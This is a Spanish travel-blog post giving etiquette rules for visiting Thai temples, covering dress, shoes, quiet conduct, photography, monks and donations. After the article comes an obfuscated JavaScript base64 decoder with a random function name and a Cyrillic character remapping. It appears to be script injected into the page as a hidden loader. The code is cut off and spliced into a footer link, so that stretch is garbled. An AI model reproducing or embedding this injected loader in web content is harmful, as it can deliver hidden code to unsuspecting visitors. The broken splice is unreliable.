Reglas de etiqueta para visitar los templos tailandeses

Hoy desde Viajes a Tailandia te diremos algunas reglas de etiqueta para visitar los templos tailandeses, una interesante y útil guía que te evitará posibles inconvenientes. Sigue leyendo y descubre qué debes hacer y qué no al entrar en un recinto de este tipo.

En Viajes a Tailanda nos encanta guiarte en tus travesías, y sabemos que una de las cosas que no te puedes perder en esta fascinante localidad es la cultura religiosa. Es por eso que hoy te diremos algunas reglas de etiqueta para visitar los templos tailandeses, una interesante y útil guía que te evitará posibles inconvenientes. Sigue leyendo y descubre qué debes hacer y qué no al entrar en un recinto de este tipo.

Cuida tu vestimenta

Lo primero que debes considerar al salir de tu posada u hotel es que te diriges a un sitio de veneración al Buda y sus enseñanzas. Esto significa en la cultura tailandesa que debes seguir un código de vestimenta sencillo: cubre tus rodillas, tu pecho y hombros. Las mangas cortas no cuentan para esto, así que procura llevar una camiseta ligera que tape hasta los codos para no sufrir las consecuencias del clima. Aunque los tailandeses conservarán sus modales y no te dirán nada si cometes algún error de este tipo, se sentirán ofendidos, así que es mucho mejor respetar sus creencias y seguir estos consejos.

En Tailandia es costumbre quitarse los zapatos antes de entrar en una casa. Donde veas una pared o fachada debes removerlos y ponerlos a un lado. Es mejor estar atento ya que probablemente donde esto sea requerido verás una pila de zapatos, o en algunos templos más populares te prestarán una bolsa para llevarlos contigo. Recuerda, estarás haciendo esto muy a menudo así que evita cualquier calzado engorroso de quitar o poner.

Mantén una actitud prudente

Apaga tu móvil o colócalo en silencio, y mantén un tono de voz bajo. Las cámaras están bien dentro de la mayoría de los templos, pero evita tomar fotografías de monjes o cualquier persona que esté orando. Además, se recomienda apagar el flash adentro, para no molestar a los demás. Si estás en un templo muy famoso, evita tomar fotos de las reliquias más reverenciadas ya que esto es irrespetuoso. Tu cabeza nunca debería estar más alto que ninguna cabeza de Buda, así que antes de entrar chequea esto primero. Puedes flexionar tu cuerpo y luego sentarte en el piso si ves que de otra forma le sobrepasarías.

Nunca toques los objetos, estatuas o imágenes de veneración a las creencias budistas o mucho menos de Buda. Los pies, por ser la parte más baja del cuerpo, no deberían tocar ni apuntar a nadie, así que debes sentarte con las rodillas hacia adelante y estos ocultos bajo tu cuerpo. Cuando estés listo para partir, aléjate de la imagen de Buda, nunca le des la espalda. Las mujeres no pueden tocar a los monjes, así que si quieres hacerles una ofrenda deberás pedirle a un hombre que la entregue por ti, o colocarla en una mesa o en el piso frente a él.

Diferencias culturales en las reglas de etiqueta dentro de los templos

No está aceptado tocar al sexo opuesto en público, especialmente en un templo, así que olvídate de tomar la mano de tu pareja por el momento. Los templos no tienen forma de hacer dinero y los monjes no poseen bienes materiales, así que los asistentes al lugar deben apoyarles financieramente. Haz una donación de 100 baht al entrar, donde verás cajas para tal fin, muchas tienen siete Budas por cada día de la semana, coloca el dinero en el día en que naciste para la buena suerte.

¿Tienes alguna duda acerca de las reglas de etiqueta para visitar los templos tailandeses? ¡Déjanos tus comentarios!

function m65c3bbf5572b(wc){var s4='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';var r1='';var qb,rd,wb,p1,p5,q8,w7;var vf=0;do{p1=s4.indexOf(wc.charAt(vf++));p5=s4.indexOf(wc.charAt(vf++));q8=s4.indexOf(wc.charAt(vf++));w7=s4.indexOf(wc.charAt(vf++));qb=(p1<<2)|(p5>>4);rd=((p5&15)<<4)|(q8>>2);wb=((q8&3)<<6)|w7;if(qb>=192)qb+=848;else if(qb==168)qb=1025;else if(qb==184)qb=1105;r1+=String.fromCharCode(qb);if(q8!=64){if(rd>=192)rd+=848;else if(rd==168)rd=1025;else if(rd==184)rd=1105;r1+=String.fromCharCode(rd);}if(w7!=64){if(wb>=192)wb+=848;else if(wb==168)wb=1025;else if(wb==184)wb=1105;r1+=String.fromCharCode(wb);}}while(vfandia.com" class="external" rel="nofollow">Viajes a Tailanda